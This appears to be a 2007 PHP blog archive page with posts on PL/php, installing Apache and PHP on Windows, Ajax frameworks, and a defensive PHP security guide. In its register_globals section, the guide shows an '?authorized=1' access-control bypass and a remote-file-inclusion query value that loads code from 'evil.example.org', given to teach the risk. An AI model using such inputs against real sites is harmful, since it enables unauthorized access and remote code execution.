wps application/vnd.ms-works
wri application/x-mswrite
wrl x-world/x-vrml
wrz x-world/x-vrml
xaf x-world/x-vrml
xbm image/x-xbitmap
xla application/vnd.ms-excel
xlc application/vnd.ms-excel
xlm application/vnd.ms-excel
xls application/vnd.ms-excel
xlt application/vnd.ms-excel
xlw application/vnd.ms-excel
xof x-world/x-vrml
xpm image/x-xpixmap
xwd image/x-xwindowdump
z application/x-compress
zip application/zip

Sunday, August 12, 2007

PHP Procedural Language for PostgreSQL

What is PL/php?

PL/php is a procedural language with hooks into the PostgreSQL database sytem, intended to allow writing of PHP functions for use as functions inside the PostgreSQL database. It was written by Command Prompt, Inc. and has since been open sourced and licensed under the PHP and PostgreSQL (BSD) licenses.

Download and Installation

Please see the installation documentation for instructions on how to install PL/php 1.0. To install the new code, which only works with PostgreSQL 8.0 and 8.1 and is currently in development, see this page instead.

Creating the PL/php language

Please see the documentation on how to create the language in a database once the library is installed. If you are using PostgreSQL 8.1 you must follow these other instructions instead.

Apache 2, PHP 4 & PHP 5 on Windows XP


This is a comprehensive guide to installing and running Apache 2.2.4 with PHP 4.4.7 and PHP 5.2.3 on Windows XP. It covers all of the steps in detail with lots of screen grabs so you can follow the process visually.


Update: The guide has been updated for PHP 5.2.3. I have also created a new forum here. Please use it if you run into trouble following this guide, I'll be only too happy to help. You don't even need to register to post.


The Guide


I know that the number of sections looks daunting, but that is because I have split the guide up into small manageable chunks. It shouldn't take you longer than a couple of minutes to complete each section.



  1. Downloads

  2. Configure Windows XP for PHP

  3. PHP 4 Settings

  4. PHP 5 Settings

  5. Create a local web site

  6. Setting the Environment Variable

  7. Install Apache

  8. Install the Apache2 Handler

  9. httpd.conf

  10. Creating a Virtual Host

  11. system32/drivers/etc/hosts

  12. Bring Apache to life

  13. Switching to PHP 5


Useful Extras



  1. Adding another web site (detailed version)

  2. Adding another web site (short version)

  3. Build a PHP 4/5 switcher

  4. Run PHP 5 as a module and PHP 4 as CGI together


Troubleshooting



  1. Apache won't start

  2. Your guide doesn't work

  3. They've just released a new version of PHP! Now what?

  4. Can't you just do it for me?


Don't be disheartened by the length of the guide! There is no reason why you can't complete the entire process in under 30 mins, and you'll be rewarded with a versatile and feature-packed local development environment as your reward.


Who is this guide aimed at?


Everyone who posts in php-general / forums asking how to get PHP and Apache running on Windows so they can develop and test locally. Often they'll hit simple but annoying problems that can be easily fixed. I also wrote this as an alternative to using a 'WAMP' installer. Teaching yourself how to install and configure PHP/Apache is a very useful set of skills to have, and well worth adding to your knowledge set.


User Feedback


Since releasing this guide I've received some great emails from people who've had success with it. Here are some of my favourite quotes: "Thank you for your VERY helpful instructions! This point on I can now learn PHP a lot better on my own computer. Cheers!" (Patrick) - "I very much appreciate your guide - you made it really easy" (Terry) - "Richard, this is truly the best guide to setting up php and apache i've seen online. Thank you so much." (Edward) - "Thanks for the great and detailed guide" (Thijs). "Thank you very much for the php guide you spent a lot of hard work to make, the guide covered everything, screenshots, alternatives as well as any possible errors and was precise and right to the point, and because of it i finally have php installed on my computer and i can learn it more conviniently." (Gaurav)


Thanks guys :) BTW all the feedback I have received so far has been incorporated into the guide. Feel free to use the new forum (see below) to send your comments / suggestions.


WAMP Guide Forum


Need help on a more 'interactive' level? Then why not use the WAMP Guide Forum. Post any questions or problems you may have. You don't even need to register to join. We'll help you as much as we can.

Wednesday, August 8, 2007

PHP Ajax Frameworks

  1. AJASON : AJASON is a PHP 5 library and JavaScript client
  2. AjaxAC : AjaxAC is an open-source framework written in PHP
  3. Ajax Agent : powerful open source framework for rapidly building Ajax or Rich Internet Applications (RIA)
  4. Cajax : A PHP class library for writing powerfull reloadless web user interfaces using Ajax (DHTML+server-side) style
  5. CakePHP : Cake is a rapid development framework for PHP which uses commonly known design patterns like ActiveRecord, Association Data Mapping, Front Controller and MVC.
  6. Claw : a convenient and intuitive way of development of PHP5 driven object oriented applications.
  7. DutchPIPE : PHP object-oriented framework to turn sites into real-time, multi-user virtual environments:
  8. Flexible Ajax : Flexible Ajax is a handler to combine the remote scripting technology, also known as AJAX (Asynchronous Javascript and XML), with a php-based backend.
  9. Guava : Groundwork Guava is a PHP-based application framework and environment.
  10. HTML_AJAX : HTML_AJAX is a PEAR package for performing AJAX operations from PHP.
  11. HTSWaf : The HTS Web Application Framework is a PHP and Javascript based framework designed to make simple web applications easy to design and implement.
  12. My-BIC : My-BIC AJAX State of Mind for PHP harmony
  13. PAJAJ : PHP Asynchronous Javascript and JSON
  14. PAJAX : Remote (a)synchronous PHP objects in JavaScript
  15. phpAjaxTags : phpAjaxTags is a port to PHP from java tag library AjaxTags.
  16. PHPWebBuilder : PHPWebBuilder is a PHP framework designed following well-known object oriented designs and principles featuring a highly reusable components architecture, metadata based persistence and traditional GUI style programming support.
  17. Qcodo : open-source PHP 5 framework
  18. Simple AJAX : This tutorial demonstrates how to perform AJAX functionality simply and effectively, using the AJAX JSMX library, coupled with the JSON-PHP library.
  19. symfony : open-source PHP5 web framework
  20. TinyAjax : TinyAjax is a small php5 library that allows you to easily add AJAX-functionality to existing pages
  21. xajax : Ajax-enable your PHP application with a simple toolkit that gets the job done fast.
  22. XOAD : PHP based AJAX/XAP object oriented framework that allows you to create richer web applications
  23. Zoop : oop is an object oriented framework for PHP based on a front controller. It is designed to be very fast and efficient and very nice for the programmer to work with.
  24. Zephyr : zephyr is an ajax based framework for php5 developers.

Tuesday, August 7, 2007

PHP Security Guide

What Is Security?

  • Security is a measurement, not a characteristic.

    It is unfortunate that many software projects list security as a simple requirement to be met. Is it secure? This question is as subjective as asking if something is hot.

  • Security must be balanced with expense.

    It is easy and relatively inexpensive to provide a sufficient level of security for most applications. However, if your security needs are very demanding, because you're protecting information that is very valuable, then you must achieve a higher level of security at an increased cost. This expense must be included in the budget of the
    project. Security must be balanced with usability.

  • It is not uncommon that steps taken to increase the security of a web application also decrease the usability. Passwords, session timeouts, and access control all create obstacles for a legitimate user. Sometimes these are necessary to provide adequate security, but
    there isn't one solution that is appropriate for every application. It is wise to be mindful of your legitimate users as you implement security measures.

  • Security must be part of the design.

    If you do not design your application with security in mind, you are doomed to be constantly addressing new security vulnerabilities.Careful programming cannot make up for a poor design.

Basic Steps

  • Consider illegitimate uses of your application.

    A secure design is only part of the solution. During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure.

  • Educate yourself.

    The fact that you are here is evidence that you care about security, and as trite as it may sound, this is the most important step. There are numerous resources available on the web and in print, and several resources are listed in the PHP Security Consortium's
    Library at http://phpsec.org/library/.

  • If nothing else, FILTER ALL EXTERNAL DATA.

    Data filtering is the cornerstone of web application security in any language and on any platform. By initializing your variables and filtering all data that comes from an external source, you will address a majority of security vulnerabilities with very little effort. A whitelist approach is better than a blacklist approach. This means that you should consider all data invalid unless it can be proven valid (rather than considering all data valid unless it can be proven invalid).

Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. While it does not represent a security vulnerability, it is a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.

Why is it a security risk? Good examples are difficult to produce for everyone, because it often requires a unique situation to make the risk clear. However, the most common example is that found in the PHP manual:

<?php

if (authenticated_user())
{
$authorized = true;
}

if ($authorized)
{
include '/highly/sensitive/data.php';
}

?>

With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control. Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $authorized in the example) are not affected by data submitted by the client. A best practice is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:


<?php

include "$path/script.php";

?>
With register_globals

enabled, this page can be
requested with
?path=http%3A%2F%2Fevil.example.org%2F%3F

in the query string in order to equate this example to the following:


<?php

include 'http://evil.example.org/?/script.php';

?>

If allow_url_fopen
is enabled (which it is by default, even in php.ini-recommended), this will include
the output of http://evil.example.org/ just as if it were a
local file. This is a major security vulnerability, and it is one that has
been discovered in some popular open source applications.

Initializing $path can mitigate this particular risk,
but so does disabling register_globals. Whereas a developer's mistake can lead to an uninitialized variable, disabling

register_globals is a global configuration change that is far less likely to be overlooked.


The convenience is wonderful, and those of us who have had to manually
handle form data in the past appreciate this. However, using the $_POST and
$_GET superglobal arrays is
still very convenient, and it's not worth the added risk to enable
register_globals. While I completely disagree with arguments that equate register_globals
to poor security, I do recommend that it be disabled.



In addition to all of this, disabling
register_globals encourages developers to be mindful of the
origin of data, and this is an important characteristic of any
security-conscious developer.



Data Filtering

As stated previously, data filtering is the cornerstone of web
application security, and this is independent of programming language or
platform. It involves the mechanism by which you determine the validity of
data that is entering and exiting the application, and a good software design
can help developers to:

  • Ensure that data filtering cannot be bypassed,

  • Ensure that invalid data cannot be mistaken for valid data,
    and

  • Identify the origin of data.

Opinions about how to ensure that data filtering cannot be bypassed
vary, but there are two general approaches that seem to be the most common,
and both of these provide a sufficient level of assurance.


The Dispatch Method

One method is to have a single PHP script available directly from the
web (via URL). Everything else is a module included with
include or require as needed. This
method usually requires that a GET variable be passed along
with every URL, identifying the task. This GET variable can
be considered the replacement for the script name that would be used in a more
simplistic design. For example:



http://example.org/dispatch.php?task=print_form

The file dispatch.php is the only file within
document root. This allows a developer to do two important things:

  • Implement some global security measures at the top of
    dispatch.php and be assured that these measures
    cannot be bypassed.

  • Easily see that data filtering takes place when necessary, by
    focusing on the control flow of a specific task.

To further explain this, consider the following example
dispatch.php script:


<?php

/* Global security measures */

switch ($_GET['task'])
{
case 'print_form':
include '/inc/presentation/form.inc';
break;

case 'process_form':
$form_valid = false;
include '/inc/logic/process.inc';
if ($form_valid)
{
include '/inc/presentation/end.inc';
}
else
{
include '/inc/presentation/form.inc';
}
break;

default:
include '/inc/presentation/index.inc';
break;
}

?>


If this is the only public PHP script, then it should be clear that the
design of this application ensures that any global security measures taken at
the top cannot be bypassed. It also lets a developer easily see the control
flow for a specific task. For example, instead of glancing through a lot of
code, it is easy to see that end.inc is only displayed to a
user when $form_valid is true, and
because it is initialized as false just before
process.inc is included, it is clear that the logic within
process.inc must set it to true,
otherwise the form is displayed again (presumably with appropriate error
messages).



Note
If you use a directory index file such as
index.php (instead of dispatch.php), you
can use URLs such as
http://example.org/?task=print_form.

You can also use the Apache ForceType directive or
mod_rewrite to accommodate URLs such as

http://example.org/app/print-form.


The Include Method

Another approach is to have a single module that is responsible for all
security measures. This module is included at the top (or very near the top)
of all PHP scripts that are public (available via URL). Consider the following
security.inc script:




<?php

switch ($_POST['form'])
{
case 'login':
$allowed = array();
$allowed[] = 'form';
$allowed[] = 'username';
$allowed[] = 'password';

$sent = array_keys($_POST);

if ($allowed == $sent)
{
include '/inc/logic/process.inc';
}

break;
}

?>

In this example, each form that is submitted is expected to have a form
variable named form that uniquely identifies it, and

security.inc has a separate case to handle the data
filtering for that particular form. An example of an HTML form that fulfills
this requirement is as follows:


<form action="/receive.php" method="POST">
<input type="hidden" name="form" value="login" />
<p>Username:
<input type="text" name="username" /></p>
<p>Password:
<input type="password" name="password" /></p>

<input type="submit" />
</form>

An array named $allowed is used to identify exactly
which form variables are allowed, and this list must be identical in order for
the form to be processed. Control flow is determined elsewhere, and
process.inc is where the actual data filtering takes
place.


Note
A good way to ensure that security.inc is
always included at the top of every PHP script is to use the

auto_prepend_file directive.


Filtering Examples

It is important to take a whitelist approach to your data filtering, and
while it is impossible to give examples for every type of form data you may
encounter, a few examples can help to illustrate a sound approach.

The following validates an email address:


<?php

$clean = array();

$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';

if (preg_match($email_pattern, $_POST['email']))
{
$clean['email'] = $_POST['email'];
}

?>


The following ensures that $_POST['color'] is

red, green, or
blue:



<?php

$clean = array();

switch ($_POST['color'])
{
case 'red':
case 'green':
case 'blue':
$clean['color'] = $_POST['color'];
break;
}

?>

The following example ensures that $_POST['num'] is
an integer:


<?php

$clean = array();

if ($_POST['num'] == strval(intval($_POST['num'])))
{
$clean['num'] = $_POST['num'];
}

?>


The following example ensures that $_POST['num'] is a
float:



<?php

$clean = array();

if ($_POST['num'] == strval(floatval($_POST['num'])))
{
$clean['num'] = $_POST['num'];
}

?>

Naming Conventions

Each of the previous examples make use of an array named
$clean. This illustrates a good practice that can help
developers identify whether data is potentially tainted. You should never make
a practice of validating data and leaving it in $_POST or

$_GET, because it is important for developers to always be
suspicious of data within these superglobal arrays.

In addition, a more liberal use of $clean can allow
you to consider everything else to be tainted, and this more closely resembles
a whitelist approach and therefore offers an increased level of
security.

If you only store data in $clean after it has been
validated, the only risk in a failure to validate something is that you might
reference an array element that doesn't exist rather than potentially tainted
data.


Timing

Once a PHP script begins processing, the entire HTTP request has been
received. This means that the user does not have another opportunity to send
data, and therefore no data can be injected into your script (even if
register_globals is enabled). This is why initializing your
variables is such a good practice.



Error Reporting

In versions of PHP prior to PHP 5, released 13 Jul 2004, error reporting
is pretty simplistic. Aside from careful programming, it relies mostly upon a
few specific PHP configuration directives:

  • error_reporting

    This directive sets the level of error reporting desired. It is
    strongly suggested that you set this to E_ALL for
    both development and production.

  • display_errors

    This directive determines whether errors should be displayed on
    the screen (included in the output). You should develop with this set
    to On, so that you can be alerted to errors during
    development, and you should set this to Off for
    production, so that errors are hidden from the users (and potential
    attackers).

  • log_errors

    This directive determines whether errors should be written to a
    log. While this may raise performance concerns, it is desirable that
    errors are rare. If logging errors presents a strain on the disk due
    to the heavy I/O, you probably have larger concerns than the
    performance of your application. You should set this directive to
    On in production.

  • error_log

    This directive indicates the location of the log file to which
    errors are written. Make sure that the web server has write privileges
    for the specified file.

Having error_reporting set to

E_ALL will help to enforce the initialization of variables,
because a reference to an undefined variable generates a notice.


Note
Each of these directives can be set with
ini_set(), in case you do not have access to
php.ini or another method of setting these
directives.

A good reference on all error handling and reporting functions is in the
PHP manual:


http://www.php.net/manual/en/ref.errorfunc.php

PHP 5 includes exception handling. For more information, see:



http://www.php.net/manual/language.exceptions.php















< Previous


Next >

Table of Contents

Form Processing